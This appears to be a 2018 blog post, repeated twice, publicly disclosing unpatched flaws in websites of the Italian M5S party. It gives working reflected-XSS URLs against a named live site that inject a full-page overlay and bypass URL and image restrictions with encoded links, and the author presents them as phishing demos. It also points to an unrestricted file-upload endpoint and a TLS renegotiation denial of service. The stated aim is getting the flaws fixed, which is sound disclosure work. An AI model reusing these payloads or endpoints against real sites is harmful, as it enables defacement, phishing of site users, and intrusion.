In the last days someone have already exposed sensitive informations about M5S.
I don't have/own/store/view those sensitive informations!
After the "supposed" security breach M5S told to newspapers and their users that all the security problems have been "fixed"and that they are investing a lot of moneys in "security" with professional companies.
I don't know what they are doing but, if true, they are mostly wasting their own moneys or those from their donors.
Note that they already got an email message, time ago, and they didn't fix those problems specified in the message and available in a previous post.
---
Movable Type is still the 2009 version (we are in 2018) and they haven't updated or fixed it.
Check the previous post and the CVEs!
---
They added an XSS protection but they haven't fixed them (XSS) in the scripts.
It's possible to create "phisihing" pages (this is an example/joke).
NOTE: what you are going to see is only on client side (just your browser). There are no modifications/manipulations on server side. Think about it as a "joke".
bypassing Url restriction
https://rousseau.movimento5stelle.it/activism_detail.php?id=525');" ></a><a href="%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%63%41%31%35%56%4a%68%38%30%6d%4d" style="width:100%;height:100%;display:block;position:fixed;z-index:1;background-color:black;top:0;left:0"><h1 style="font-width:80px;color:white">Senza Sentenza!</h1></a><a c="
tinyurl: http://tiny.cc/08w9xy
archived: http://archive.is/ke1Uz
With this url we can also bypass the image restriction - http headers img-src
https://rousseau.movimento5stelle.it/activism_detail.php?id=525');" ></a><a href="%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%63%41%31%35%56%4a%68%38%30%6d%4d" style="width:100%;height:100%;display:block;position:fixed;z-index:2;background-color:black;top:0;left:0"><h1 style="font-width:80px;color:white">Senza Sentenza!</h1><br><img src="%68%74%74%70%73%3a%2f%2f%65%6e%63%72%79%70%74%65%64%2d%74%62%6e%30%2e%67%73%74%61%74%69%63%2e%63%6f%6d%2f%69%6d%61%67%65%73%3f%71%3d%74%62%6e%3a%41%4e%64%39%47%63%53%30%43%6a%65%7a%4e%79%6a%72%4f%75%5a%6f%33%51%6b%69%79%4d%63%57%63%4d%4d%39%2d%33%64%36%51%44%49%77%6a%6f%38%6a%73%39%39%53%53%48%6b%58%59%67%37%44" style="width:800px;height:400px"/></a><a c="
tinyurl: http://tiny.cc/53x9xy
archived: http://archive.is/mAXZm
JS restriction can be bypassed with <video and other tags.
------------------------------------
Different possible DoS - TLS client-initiated renegotiations
The old thc ssl DoS seems to work (ex. on movimento5stelle.it, ilblogdellestelle.it).
Note:Not fully tested to avoid possible legal problems.
------------------------------------
File Upload
It's possible to upload files
via /php/load_cid.php
ignoring the file extension.
------------------------------------
The ilblogdellestelle.it is affected by various (old) problems and there's also a possible rootkit/backdoor/Idontknow since there's a suid binary in /tmp and the logs have been tampered by someone. I don't know who did it.
------------------------------------
I'm just a "viewer". Don't bother me with legal stuff since I never did anything harmful and I will never do it also because I have no interests into wasting time and moneys in lawsuits.
Check the problems and, if confirmed, just fix them.
I don't have/own/store/view those sensitive informations!
After the "supposed" security breach M5S told to newspapers and their users that all the security problems have been "fixed"and that they are investing a lot of moneys in "security" with professional companies.
I don't know what they are doing but, if true, they are mostly wasting their own moneys or those from their donors.
Note that they already got an email message, time ago, and they didn't fix those problems specified in the message and available in a previous post.
---
Movable Type is still the 2009 version (we are in 2018) and they haven't updated or fixed it.
Check the previous post and the CVEs!
---
They added an XSS protection but they haven't fixed them (XSS) in the scripts.
It's possible to create "phisihing" pages (this is an example/joke).
NOTE: what you are going to see is only on client side (just your browser). There are no modifications/manipulations on server side. Think about it as a "joke".
bypassing Url restriction
https://rousseau.movimento5stelle.it/activism_detail.php?id=525');" ></a><a href="%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%63%41%31%35%56%4a%68%38%30%6d%4d" style="width:100%;height:100%;display:block;position:fixed;z-index:1;background-color:black;top:0;left:0"><h1 style="font-width:80px;color:white">Senza Sentenza!</h1></a><a c="
tinyurl: http://tiny.cc/08w9xy
archived: http://archive.is/ke1Uz
With this url we can also bypass the image restriction - http headers img-src
https://rousseau.movimento5stelle.it/activism_detail.php?id=525');" ></a><a href="%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%63%41%31%35%56%4a%68%38%30%6d%4d" style="width:100%;height:100%;display:block;position:fixed;z-index:2;background-color:black;top:0;left:0"><h1 style="font-width:80px;color:white">Senza Sentenza!</h1><br><img src="%68%74%74%70%73%3a%2f%2f%65%6e%63%72%79%70%74%65%64%2d%74%62%6e%30%2e%67%73%74%61%74%69%63%2e%63%6f%6d%2f%69%6d%61%67%65%73%3f%71%3d%74%62%6e%3a%41%4e%64%39%47%63%53%30%43%6a%65%7a%4e%79%6a%72%4f%75%5a%6f%33%51%6b%69%79%4d%63%57%63%4d%4d%39%2d%33%64%36%51%44%49%77%6a%6f%38%6a%73%39%39%53%53%48%6b%58%59%67%37%44" style="width:800px;height:400px"/></a><a c="
tinyurl: http://tiny.cc/53x9xy
archived: http://archive.is/mAXZm
JS restriction can be bypassed with <video and other tags.
------------------------------------
Different possible DoS - TLS client-initiated renegotiations
Note:Not fully tested to avoid possible legal problems.
------------------------------------
File Upload
It's possible to upload files
via /php/load_cid.php
ignoring the file extension.
------------------------------------
The ilblogdellestelle.it is affected by various (old) problems and there's also a possible rootkit/backdoor/Idontknow since there's a suid binary in /tmp and the logs have been tampered by someone. I don't know who did it.
------------------------------------
I'm just a "viewer". Don't bother me with legal stuff since I never did anything harmful and I will never do it also because I have no interests into wasting time and moneys in lawsuits.
Check the problems and, if confirmed, just fix them.
Comments
Post a Comment